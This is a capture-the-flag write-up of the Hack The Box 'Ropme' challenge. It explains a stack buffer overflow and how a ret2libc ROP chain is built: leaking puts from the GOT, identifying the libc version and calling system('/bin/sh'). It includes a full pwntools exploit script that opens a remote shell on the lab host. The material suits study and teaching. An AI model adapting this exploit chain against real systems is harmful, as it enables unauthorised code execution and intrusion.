Hack The Box / Challenges / Pwn / Ropme

This is my first writeup of a ROP-style challenge, so apologies for the level of detail.

Downloading the binary and disassembling it:

gef➤  uf main
Dump of assembler code for function main:
   0x0000000000400626 <+0>:   push   rbp                      <-- rsp = sp0 - 8
   0x0000000000400627 <+1>:   mov    rbp,rsp                  <-- rbp = sp0 - 8
   0x000000000040062a <+4>:   sub    rsp,0x50                 <-- rsp = sp0 - 8 - 80
   0x000000000040062e <+8>:   mov    DWORD PTR [rbp-0x44],edi
   0x0000000000400631 <+11>:  mov    QWORD PTR [rbp-0x50],rsi
   0x0000000000400635 <+15>:  mov    edi,0x4006f8
   0x000000000040063a <+20>:  call   0x4004e0 <puts@plt>
   0x000000000040063f <+25>:  mov    rax,QWORD PTR [rip+0x200a0a]        # 0x601050 <stdout@@GLIBC_2.2.5>
   0x0000000000400646 <+32>:  mov    rdi,rax
   0x0000000000400649 <+35>:  call   0x400510 <fflush@plt>
   0x000000000040064e <+40>:  mov    rdx,QWORD PTR [rip+0x200a0b]        # 0x601060 <stdin@@GLIBC_2.2.5>
   0x0000000000400655 <+47>:  lea    rax,[rbp-0x40]           <-- rax = (sp0 - 8) - 64 = sp0 - 72
   0x0000000000400659 <+51>:  mov    esi,0x1f4
   0x000000000040065e <+56>:  mov    rdi,rax                  <-- rdi = rax = sp0 - 72
   0x0000000000400661 <+59>:  call   0x400500 <fgets@plt>     
   0x0000000000400666 <+64>:  mov    eax,0x0
   0x000000000040066b <+69>:  leave                           <-- mov rsp,rbp ; pop rbp  
   0x000000000040066c <+70>:  ret    
End of assembler dump.

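The assembly is simple enough to analyze by hand. fgets is called with a size of 0x1f4 (500) and a destination buffer that starts at rbp-0x40, only 64 bytes below the saved rbp. The saved rbp takes another 8 bytes, so the return address used by the ret instruction sits at an offset of 72 bytes from the start of the buffer.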
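The same arithmetic can be written down as a small Python sketch. The constant names are mine; the values are read straight from the disassembly above.

```python
# Values taken from the disassembly of main.
BUF_OFFSET_FROM_RBP = 0x40   # lea rax,[rbp-0x40]
SAVED_RBP_SIZE = 8           # pushed by "push rbp"
FGETS_SIZE = 0x1f4           # mov esi,0x1f4

# Distance from the start of the buffer to the saved return address.
ret_offset = BUF_OFFSET_FROM_RBP + SAVED_RBP_SIZE
print(ret_offset)

# fgets stores at most size - 1 bytes, which is far more than the
# 72 filler bytes plus the 8-byte return address we want to overwrite.
can_overwrite_ret = FGETS_SIZE - 1 >= ret_offset + 8
print(can_overwrite_ret)
```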

We can confirm with the following payload:

$ python -c "print('a' * 72 + 'b' * 8)"

And running gdb/gef:

$ gdb ./ropme 
...
gef➤  run
Starting program: /home/ropme/ropme 
ROP me outside, how 'about dah?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb

Program received signal SIGSEGV, Segmentation fault.
...
 →   0x40066c <main+70>        ret    
 [!] Cannot disassemble from $PC
 ────────────────────────────────────────────────────────────── threads ────
 [#0] Id 1, Name: "ropme", stopped 0x40066c in main (), reason: SIGSEGV
 ──────────────────────────────────────────────────────────────── trace ────
 [#0] 0x40066c → main()
 ───────────────────────────────────────────────────────────────────────────
 0x000000000040066c in main ()

It tried to return to a bad address, let's confirm it is the one expected in the payload:

gef➤  dq $rsp l2
0x00007fffffffe408│+0x0000   0x6262626262626262   
0x00007fffffffe410│+0x0008   0x000000000004000a
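
The first quadword at the top of the stack is easier to compare with the payload once it is converted back to bytes. A minimal check in Python, using the value shown by gef above:

```python
import struct

# Quadword that ret tried to use as the return address.
top_of_stack = 0x6262626262626262

# x86-64 is little-endian, so pack the value the way it sits in memory.
raw = struct.pack("<Q", top_of_stack)
print(raw)
```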

Confirmed. Since this is a ROP challenge, we expect the stack to be non-executable, which rules out the simpler approach of placing shellcode on the stack and jumping to it:

gef➤  checksec
[+] checksec for '/home/ropme/ropme'
Canary                        : ✘ 
NX                            : ✓    <----- stack pages non-executable
PIE                           : ✘ 
Fortify                       : ✘ 
RelRO                         : Partial

The short explanation is that we are going to chain "gadgets": short instruction sequences that already exist in executable memory and end in ret, so each one performs a small step and then returns to the next address we placed on the stack. Gadgets can come from any executable page mapped into the process, including the binary's own code segment and the imported libraries.

In the end I assume we need to get a shell, and that the inbound TCP stream is forwarded to the program's stdin while the program's stdout is sent back over the connection. Typical shellcode in buffer overflow exploits looks something like:

mov edx,0
mov esi,0
lea rdi, ... pointer to "/bin/sh"
call execve

However, execve requires three arguments. If we use system() instead, only one is needed and the code looks like this:

lea rdi, ... pointer to "/bin/sh"
xor eax, eax
sub rsp, 8    <-- keeps rsp 16-byte aligned at the call, as the x86-64 System V ABI expects; might not be necessary
call system

As the man page describes, system() takes care of forking a child process, which inherits the program's stdin and stdout, and runs the command through execl:

execl("/bin/sh", "sh", "-c", command, (char *) 0);

For this to work, the string /bin/sh has to exist inside libc itself, which is why ROP payloads commonly borrow it from there. With this information we can sketch a potential payload:

0                         72                             80                     88
< ... filler bytes ... >  < address of "pop rdi; ret" >  < "/bin/sh" address >  < address of system >

However, this payload relies on three addresses:

system       0x00007ffff7a79480 <- inside libc6
"/bin/sh"    0x00007ffff7b9bc19 <- inside libc6
pop rdi;ret  0x00000000004006d3 <- inside ropme binary space

...but we do not know the addresses of the libc6 system function and the /bin/sh string on the target. They depend on the exact libc build in use and are not the same across libc versions.

To overcome this problem we first need to know which libc6 version is being used. One hint for the libc6 version can actually be found in the binary comment section:

$ readelf ropme --string-dump=27

String dump of section '.comment':
  [     0]  GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609

It seems the binary was built on Ubuntu 16.04 (xenial), and we can find more information about the gcc package at:

https://launchpad.net/ubuntu/xenial/amd64/gcc-5/5.4.0-6ubuntu1~16.04.4

This appears to be an exact match for the gcc package. It depends on libc6 >= 2.15, and following that dependency link leads to:

https://launchpad.net/ubuntu/xenial/amd64/libc6

This page lists every libc6 version available for this Ubuntu release. They all belong to two upstream versions: 2.21-0ubuntuX and 2.23-0ubuntuX. This narrows the search, but there is a faster and more common approach: leak the runtime address of one or more libc functions and compare it against a database of known libc builds.

We know that ropme imports three functions: puts, fgets and fflush. The idea is to call puts with the address of the puts GOT entry as its argument, so that it prints the resolved address of puts itself. The ROP chain looks like:

< filler bytes > < pop rdi > < puts func GOT > < puts >

This results in:

puts 0x7f46623d5690
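
To make the leak step concrete, here is a minimal sketch in plain Python of how this chain could be packed and how the reply could be turned into an address. The helper names pack64 and parse_leak are mine. The three binary addresses and the sample reply bytes are the ones that appear in the script output further down, so they belong to a different run than the address printed above. puts stops at the first NUL byte, which is why only six bytes come back.

```python
import struct

# Addresses inside the non-PIE ropme binary (from the script output in this writeup).
POP_RDI_RET = 0x4006d3
PUTS_GOT = 0x601018
PUTS_PLT = 0x4004e0

def pack64(value):
    """Pack an integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)

def parse_leak(line):
    """Turn the raw bytes printed by puts into an integer address."""
    # Strip the newline appended by puts and pad back to 8 bytes.
    # Caveat: this would misbehave if the address itself ended in 0x0a.
    return int.from_bytes(line.rstrip(b"\n").ljust(8, b"\x00"), "little")

# 72 filler bytes, then: rdi = &GOT[puts]; call puts.
leak_chain = b"a" * 72 + pack64(POP_RDI_RET) + pack64(PUTS_GOT) + pack64(PUTS_PLT)

# Sample reply from one run; ASLR makes it differ between runs.
sample_reply = bytes.fromhex("9076a309727f") + b"\n"
leaked_puts = parse_leak(sample_reply)
print(hex(leaked_puts))
```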

Plugging this into libc.blukat.me gives two matches:

First library with name libc6_2.23-0ubuntu10_amd64
Second library with name libc6_2.23-0ubuntu11_amd64

This agrees with our earlier findings: the target uses 2.23-0ubuntuX. We could try to narrow the results further by leaking the addresses of other imported functions, but doing so with 2 additional functions led to the same two matches.
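
As far as I understand it, this kind of lookup works because libraries are mapped at page-aligned addresses, so the low 12 bits of a leaked address equal the low 12 bits of the symbol's offset inside the library file. The sketch below illustrates the idea; could_match is a hypothetical helper of mine and not part of any tool. The puts offset is the one nm reports for the local libc copy in this writeup.

```python
PAGE_MASK = 0xfff  # 4 KiB pages: the load address never changes these bits

def could_match(leaked_addr, symbol_offset):
    """True if a libc with this symbol offset is compatible with the leak."""
    return (leaked_addr & PAGE_MASK) == (symbol_offset & PAGE_MASK)

leaked_puts = 0x7f46623d5690   # address printed by the leak chain
puts_offset = 0x6f690          # puts offset in libc6_2.23-0ubuntu10_amd64

print(could_match(leaked_puts, puts_offset))
```

Several builds can share the same low bits for one symbol, which is why leaking more than one function can help to tell candidates apart.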

Now that we have the libc6 version and its binary, we can work out the addresses of the system function and of the /bin/sh string inside libc6. The libc6 base address is the leaked function address minus the offset of that function in our local copy of the library.

$ nm -D libc6_2.23-0ubuntu10_amd64.so  | fgrep "W puts"
000000000006f690 W puts

Then our table of symbols is updated:

             offset     v.addr.
puts        0006f690   0x7f425c62a690  (base = 0x7f425c62a690 - 0x0006f690 = 0x7F425C5BB000)
system      00045390   base + 00045390 = 0x7f425c600390  
"/bin/sh"   0018cd57   base + 0018cd57 = 0x7f425c747d57
pop rdi;ret            004006d3
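
The arithmetic in the table can be reproduced with a few lines of Python. The offsets and the leaked puts address are the ones from the table; the variable names are mine.

```python
# Offsets inside libc6_2.23-0ubuntu10_amd64.so, from the table above.
PUTS_OFFSET = 0x0006f690
SYSTEM_OFFSET = 0x00045390
BIN_SH_OFFSET = 0x0018cd57

leaked_puts = 0x7f425c62a690  # runtime address of puts for this run

libc_base = leaked_puts - PUTS_OFFSET
# A correct base should be page-aligned; if not, the libc guess is wrong.
assert libc_base & 0xfff == 0

system_addr = libc_base + SYSTEM_OFFSET
bin_sh_addr = libc_base + BIN_SH_OFFSET
print(hex(libc_base), hex(system_addr), hex(bin_sh_addr))
```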

Note that the pop rdi; ret gadget can be found with a tool like ropper. Such tools search the executable portions of the binary for the opcode bytes of the gadget and then compute the corresponding virtual address.
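
A rough sketch of that search, assuming the executable bytes are already in memory and we know the virtual address they are loaded at. The bytes 5f c3 encode pop rdi; ret. The blob below is synthetic: I made its layout up so that the hit lands on the same address as in the table, and it is not read from the real binary. It ends in pop r15; ret (41 5f c3), because this gadget often shows up by jumping one byte into such a longer instruction.

```python
POP_RDI_RET = b"\x5f\xc3"  # opcode bytes of "pop rdi; ret"

def find_gadget(code, load_address, pattern=POP_RDI_RET):
    """Return the virtual address of every occurrence of pattern in code."""
    hits = []
    start = code.find(pattern)
    while start != -1:
        hits.append(load_address + start)
        start = code.find(pattern, start + 1)
    return hits

# Synthetic stand-in for a code segment: nop padding, then "pop r15; ret".
fake_code = b"\x90" * 0x6d2 + b"\x41\x5f\xc3"
gadgets = find_gadget(fake_code, 0x400000)
print([hex(address) for address in gadgets])
```

Real tools also parse the ELF headers to find which segments are executable and where they are mapped; this sketch skips that part.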

We now have everything needed to build our final ROP chain payload:

0                 72           80           88
< filler bytes >   < pop rdi >  < /bin/sh >  < system >

In python:

import struct

def p64(n):
    # Pack an integer as 8 little-endian bytes
    return struct.pack('<Q', n)

lib_base = 0x7F425C5BB000
payload = b'a' * 72 + p64(0x004006d3) + p64(lib_base + 0x0018cd57) + p64(lib_base + 0x00045390)

Since libc may be loaded at a different base address on each run, the program must keep running after we receive the leaked puts address. To achieve that, we simply append the address of main to the leak chain, so that the program starts over and reads a second payload.

Instead of doing this in pure Python, we can use the pwntools library to help us, now that we know in detail what we are doing. I used the great template from the hacktricks site, simplified and with a few fixes to make it work with my Python version.

from __future__ import print_function
from pwn import * # Import pwntools

libc = ELF("libc6_2.23-0ubuntu10_amd64.so")
p = remote('docker.hackthebox.eu',31894)
local_bin = "./ropme"
elf = ELF(local_bin)
rop = ROP(elf)

OFFSET = b"A" * 72 # Filler up to the saved return address
PUTS_PLT = elf.plt['puts']
MAIN_PLT = elf.symbols['main'] # Address of main itself (not a PLT entry), used to restart the program
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] # Same as ROPgadget --binary ropme | grep "pop rdi"

log.info("Function 'main' address: 0x%08x" % MAIN_PLT)
log.info("Function 'puts' plt address: 0x%08x" % PUTS_PLT)
log.info("Gadget 'pop rdi; ret' address: 0x%08x" % POP_RDI)

def get_addr(func_name):
    FUNC_GOT = elf.got[func_name]
    log.info(func_name + " GOT @ " + hex(FUNC_GOT))
    # Create rop chain: puts(FUNC_GOT), then return to main for the second stage
    rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)

    # Send our rop-chain payload
    print(p.clean()) # clean socket buffer (read all and print)
    p.sendline(rop1)

    # Parse leaked address
    received = p.recvline().strip()
    receiveds = "".join(["%02x" % b for b in received])
    log.info("Received: %s" % receiveds)
    leak = u64(received.ljust(8, b"\x00"))
    log.info("Leaked libc address,  "+func_name+": "+ hex(leak))

    # If not libc yet, stop here
    if libc != "":
        libc.address = leak - libc.symbols[func_name] # Save libc base
        log.info("libc base @ %s" % hex(libc.address))

    return hex(leak)

get_addr("puts") # Search for the puts address in memory to obtain the libc base
if libc == "":
    print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
    p.interactive()

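# On this target the /bin/sh string turned out to be 64 bytes lower than in our local libc copy, so we subtract 64.
# I have not confirmed why; possibly the remote runs a different build than our local copy (the lookup returned two matches).
BINSH = next(libc.search(b"/bin/sh")) - 64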
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]

log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))

rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)

rop2s = "".join(["%02x" % b for b in rop2])
log.info("rop2 is %s" % rop2s)

p.clean()
p.sendline(rop2)

# Interact with the shell #####
p.interactive() # Interact with the connection

The output is:

$ python3 solve.py 
[*] '/home/ropme/libc6_2.23-0ubuntu10_amd64.so'
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
[+] Opening connection to docker.hackthebox.eu on port 31894: Done
[*] '/home/ropme/ropme'
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
[*] Loaded 14 cached gadgets for './ropme'
[*] Function 'main' address: 0x00400626
[*] Function 'puts' plt address: 0x004004e0
[*] Gadget 'pop rdi; ret' address: 0x004006d3
[*] puts GOT @ 0x601018
b"ROP me outside, how 'about dah?\n"
[*] Received: 9076a309727f
[*] Leaked libc address,  puts: 0x7f7209a37690
[*] libc base @ 0x7f72099c8000
[*] bin/sh 0x7f7209b54d17 
[*] system 0x7f7209a0d390 
[*] rop2 is 414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141d306400000000000174db509727f000090d3a009727f00003020a009727f0000
[*] Switching to interactive mode
$ cat flag.txt
HTB{r0p_m3_if_y0u_c4n!}
$
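
As a sanity check, the rop2 bytes logged above can be decoded back into the four addresses of the chain. This is only a sketch: the filler is written as "41" * 72 (matching OFFSET in the script) instead of being pasted, and the libc base is the one from the same log.

```python
import struct

# rop2 as logged by the script: 72 filler bytes followed by four quadwords.
rop2_hex = (
    "41" * 72
    + "d306400000000000"   # pop rdi; ret
    + "174db509727f0000"   # "/bin/sh"
    + "90d3a009727f0000"   # system
    + "3020a009727f0000"   # exit
)
rop2 = bytes.fromhex(rop2_hex)

filler, tail = rop2[:72], rop2[72:]
pop_rdi, bin_sh, system, exit_addr = struct.unpack("<4Q", tail)

libc_base = 0x7f72099c8000  # "libc base" line of the same run
print(hex(pop_rdi))
print(hex(bin_sh - libc_base), hex(system - libc_base), hex(exit_addr - libc_base))
```

The decoded /bin/sh offset is 0x18cd17, which is the 0x18cd57 from the symbol table minus the 64 bytes subtracted in the script.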

References:

https://www.slideshare.net/inaz2/rop-illmatic-exploring-universal-rop-on-glibc-x8664-en-41595384
https://book.hacktricks.xyz/exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address